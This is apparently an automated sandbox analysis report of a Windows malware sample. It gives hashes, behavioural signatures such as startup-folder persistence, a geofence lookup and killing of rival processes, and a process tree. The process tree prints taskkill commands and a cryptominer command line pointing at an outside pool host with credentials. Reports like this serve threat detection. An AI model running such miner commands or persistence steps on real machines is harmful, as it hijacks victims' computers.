Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
06/12/2022, 00:16
Static task
static1
Behavioral task
behavioral1
Sample
a48fe92565c137832f13c9745a7e9d46140a8eba5056bf8466f3664a8c27bf32.exe
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
a48fe92565c137832f13c9745a7e9d46140a8eba5056bf8466f3664a8c27bf32.exe
Resource
win10v2004-20220812-en
General
-
Target
a48fe92565c137832f13c9745a7e9d46140a8eba5056bf8466f3664a8c27bf32.exe
-
Size
396KB
-
MD5
5c8169f5cca362ce7c22b25eda15fbd8
-
SHA1
41999d841d4445d7178b2a8625b273c893482403
-
SHA256
a48fe92565c137832f13c9745a7e9d46140a8eba5056bf8466f3664a8c27bf32
-
SHA512
376e6b0fd4457dfa299db1e83673c56830ae3310d516c9a19d7f42ee4b0c83a640e2b244fc9756d9d6dc9243e9a758de862e10140c6a03d66bd26f8c5520ae3a
-
SSDEEP
12288:uutrzh9xOXkF91QHrdGwQMu/yvSqi39mU6lnm:uutr5OUFnQZGn/Q9i39mZlnm
Malware Config
Signatures
-
Executes dropped EXE 3 IoCs
pid Process 4740 stepx2.exe 3496 hid.exe 1112 x30811.exe -
resource yara_rule behavioral2/files/0x0006000000022e71-146.dat upx behavioral2/files/0x0006000000022e71-147.dat upx behavioral2/memory/1112-148-0x0000000000400000-0x0000000000500000-memory.dmp upx behavioral2/memory/1112-149-0x0000000000400000-0x0000000000500000-memory.dmp upx -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation a48fe92565c137832f13c9745a7e9d46140a8eba5056bf8466f3664a8c27bf32.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation stepx2.exe -
Drops startup file 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\__tmp_rar_sfx_access_check_240573343 a48fe92565c137832f13c9745a7e9d46140a8eba5056bf8466f3664a8c27bf32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\stepx2.exe a48fe92565c137832f13c9745a7e9d46140a8eba5056bf8466f3664a8c27bf32.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\stepx2.exe a48fe92565c137832f13c9745a7e9d46140a8eba5056bf8466f3664a8c27bf32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 3 IoCs
pid Process 1352 taskkill.exe 4936 taskkill.exe 1640 taskkill.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 4936 taskkill.exe Token: SeDebugPrivilege 1640 taskkill.exe Token: SeDebugPrivilege 1352 taskkill.exe -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 4268 wrote to memory of 4740 4268 a48fe92565c137832f13c9745a7e9d46140a8eba5056bf8466f3664a8c27bf32.exe 81 PID 4268 wrote to memory of 4740 4268 a48fe92565c137832f13c9745a7e9d46140a8eba5056bf8466f3664a8c27bf32.exe 81 PID 4268 wrote to memory of 4740 4268 a48fe92565c137832f13c9745a7e9d46140a8eba5056bf8466f3664a8c27bf32.exe 81 PID 4740 wrote to memory of 3496 4740 stepx2.exe 82 PID 4740 wrote to memory of 3496 4740 stepx2.exe 82 PID 4740 wrote to memory of 3496 4740 stepx2.exe 82 PID 3496 wrote to memory of 1296 3496 hid.exe 83 PID 3496 wrote to memory of 1296 3496 hid.exe 83 PID 3496 wrote to memory of 1296 3496 hid.exe 83 PID 1296 wrote to memory of 4936 1296 cmd.exe 86 PID 1296 wrote to memory of 4936 1296 cmd.exe 86 PID 1296 wrote to memory of 4936 1296 cmd.exe 86 PID 1296 wrote to memory of 1640 1296 cmd.exe 87 PID 1296 wrote to memory of 1640 1296 cmd.exe 87 PID 1296 wrote to memory of 1640 1296 cmd.exe 87 PID 1296 wrote to memory of 1352 1296 cmd.exe 88 PID 1296 wrote to memory of 1352 1296 cmd.exe 88 PID 1296 wrote to memory of 1352 1296 cmd.exe 88 PID 1296 wrote to memory of 1112 1296 cmd.exe 89 PID 1296 wrote to memory of 1112 1296 cmd.exe 89 PID 1296 wrote to memory of 1112 1296 cmd.exe 89
Processes
-
C:\Users\Admin\AppData\Local\Temp\a48fe92565c137832f13c9745a7e9d46140a8eba5056bf8466f3664a8c27bf32.exe"C:\Users\Admin\AppData\Local\Temp\a48fe92565c137832f13c9745a7e9d46140a8eba5056bf8466f3664a8c27bf32.exe"1⤵
- Checks computer location settings
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:4268 -
C:\Users\Admin\Start Menu\Programs\Startup\stepx2.exe"C:\Users\Admin\Start Menu\Programs\Startup\stepx2.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4740 -
C:\Users\Admin\AppData\Local\Temp\hid.exe"C:\Users\Admin\AppData\Local\Temp\hid.exe" /NOCONSOLE yz.bat3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3496 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yz.bat4⤵
- Suspicious use of WriteProcessMemory
PID:1296 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im svchoost.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4936
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mamita.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1640
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im x11811.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1352
-
-
C:\Users\Admin\AppData\Local\Temp\x30811.exex30811.exe -a 60 -g yes -o http://y.bethyname.info:8332/ -u redem_guild -p redemxxx5x2 -t 25⤵
- Executes dropped EXE
PID:1112
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
43KB
MD5c1c769d742f88e441ded76bf57a5a45c
SHA106872dabd41e70dc4ef8fd5131b334be8a17db3c
SHA2563e857094c9d89b31676477ce7d8d523f94c767f3cb0769dae99af76b3c4e004b
SHA512d35478590ab1abee0293589a8b8cc13307afb0a14d7bd01a35388114ace6cb007e0f132e5d90bc5ae90b3e36a3edef67354a94363415cf2a1d3ef5f4ae99636f
-
Filesize
43KB
MD5c1c769d742f88e441ded76bf57a5a45c
SHA106872dabd41e70dc4ef8fd5131b334be8a17db3c
SHA2563e857094c9d89b31676477ce7d8d523f94c767f3cb0769dae99af76b3c4e004b
SHA512d35478590ab1abee0293589a8b8cc13307afb0a14d7bd01a35388114ace6cb007e0f132e5d90bc5ae90b3e36a3edef67354a94363415cf2a1d3ef5f4ae99636f
-
Filesize
252KB
MD505b0cc5b7cf23668bff73252aee633f4
SHA1981766824c1ff41a88a9babcf07fdaa6c03cfc64
SHA2560999ac7185282e800e1d255f510dd4f349ce3c5b21a1a9bb5dc85cfd2a3941f1
SHA512ca395c530edf615942ad1e2a59e20e4429068dcfee4dc932c89d7200dae58443d9ed4d88a1e1c62dd5b5da9e15389e391011c79e0e05974a9e461134d9c3bc64
-
Filesize
252KB
MD505b0cc5b7cf23668bff73252aee633f4
SHA1981766824c1ff41a88a9babcf07fdaa6c03cfc64
SHA2560999ac7185282e800e1d255f510dd4f349ce3c5b21a1a9bb5dc85cfd2a3941f1
SHA512ca395c530edf615942ad1e2a59e20e4429068dcfee4dc932c89d7200dae58443d9ed4d88a1e1c62dd5b5da9e15389e391011c79e0e05974a9e461134d9c3bc64
-
Filesize
177B
MD5b8c466d2f66004d05f71a5484105e09c
SHA10d14cad742e6f2b07d9048b608ad6323986d6564
SHA25654f81b14c36b97c95717665082984427e61fbd52a36e2ff705a0c64e8415d186
SHA51291818f7223e530a732b4da1f2adae588a3dad3a9271cf0cd2a8b2b02a724ed01c6570e69836d274db0210c26428215b8ab1d6d15d3a37b47231c2c9a850607e6
-
Filesize
347KB
MD5f83b54e2d32ef76e9417dbadd228dacb
SHA1ccad473fbec4c815577d3ceca625e3c0c72dbea8
SHA2562e8a59f390997f0e63e2b905c423fee9afe93bc31ca7ca253495a2d6f26591b7
SHA51292bdb15ef0f204bc17f311edfcc52c785bfde99caf0bb60926ff7d8aee94e17979a052ed8b4f8f26565bbbcea4b2d55f10f5913fa67631279683efcb0af8d280
-
Filesize
347KB
MD5f83b54e2d32ef76e9417dbadd228dacb
SHA1ccad473fbec4c815577d3ceca625e3c0c72dbea8
SHA2562e8a59f390997f0e63e2b905c423fee9afe93bc31ca7ca253495a2d6f26591b7
SHA51292bdb15ef0f204bc17f311edfcc52c785bfde99caf0bb60926ff7d8aee94e17979a052ed8b4f8f26565bbbcea4b2d55f10f5913fa67631279683efcb0af8d280